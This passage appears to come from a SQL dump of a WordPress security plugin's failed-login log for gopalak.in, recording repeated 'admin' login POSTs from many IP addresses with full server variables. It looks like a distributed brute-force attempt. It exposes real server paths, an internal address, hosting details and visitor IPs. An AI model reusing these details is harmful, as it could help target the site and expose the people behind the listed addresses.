:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746930188.9631951;s:12:\"REQUEST_TIME\";i:1746930188;}}','183.82.35.191',0,'2025-05-11 07:53:10','1970-01-01 00:00:00'),(95414,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44770\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746930561.350899;s:12:\"REQUEST_TIME\";i:1746930561;}}','68.65.123.38',0,'2025-05-11 07:59:23','1970-01-01 00:00:00'),(95415,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42790\";s:11:\"REMOTE_ADDR\";s:14:\"192.250.229.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746930933.9592171;s:12:\"REQUEST_TIME\";i:1746930933;}}','192.250.229.38',0,'2025-05-11 08:05:35','1970-01-01 00:00:00'),(95416,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42432\";s:11:\"REMOTE_ADDR\";s:13:\"103.72.97.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746931309.776989;s:12:\"REQUEST_TIME\";i:1746931309;}}','103.72.97.210',0,'2025-05-11 08:11:51','1970-01-01 00:00:00'),(95417,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58472\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.137.129\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746931683.3421061;s:12:\"REQUEST_TIME\";i:1746931683;}}','66.29.137.129',0,'2025-05-11 08:18:05','1970-01-01 00:00:00'),(95418,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50982\";s:11:\"REMOTE_ADDR\";s:15:\"162.214.206.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746932057.6277151;s:12:\"REQUEST_TIME\";i:1746932057;}}','162.214.206.216',0,'2025-05-11 08:24:19','1970-01-01 00:00:00'),(95419,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36518\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746932432.1519649;s:12:\"REQUEST_TIME\";i:1746932432;}}','103.191.76.181',0,'2025-05-11 08:30:33','1970-01-01 00:00:00'),(95420,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39986\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746932807.5974419;s:12:\"REQUEST_TIME\";i:1746932807;}}','164.90.225.186',0,'2025-05-11 08:36:49','1970-01-01 00:00:00'),(95421,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54514\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746933178.8302131;s:12:\"REQUEST_TIME\";i:1746933178;}}','198.27.67.210',0,'2025-05-11 08:43:00','1970-01-01 00:00:00'),(95422,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59722\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.32.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746933550.211875;s:12:\"REQUEST_TIME\";i:1746933550;}}','63.250.32.87',0,'2025-05-11 08:49:11','1970-01-01 00:00:00'),(95423,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44074\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.100\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746933924.6268239;s:12:\"REQUEST_TIME\";i:1746933924;}}','198.54.125.100',0,'2025-05-11 08:55:26','1970-01-01 00:00:00'),(95424,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 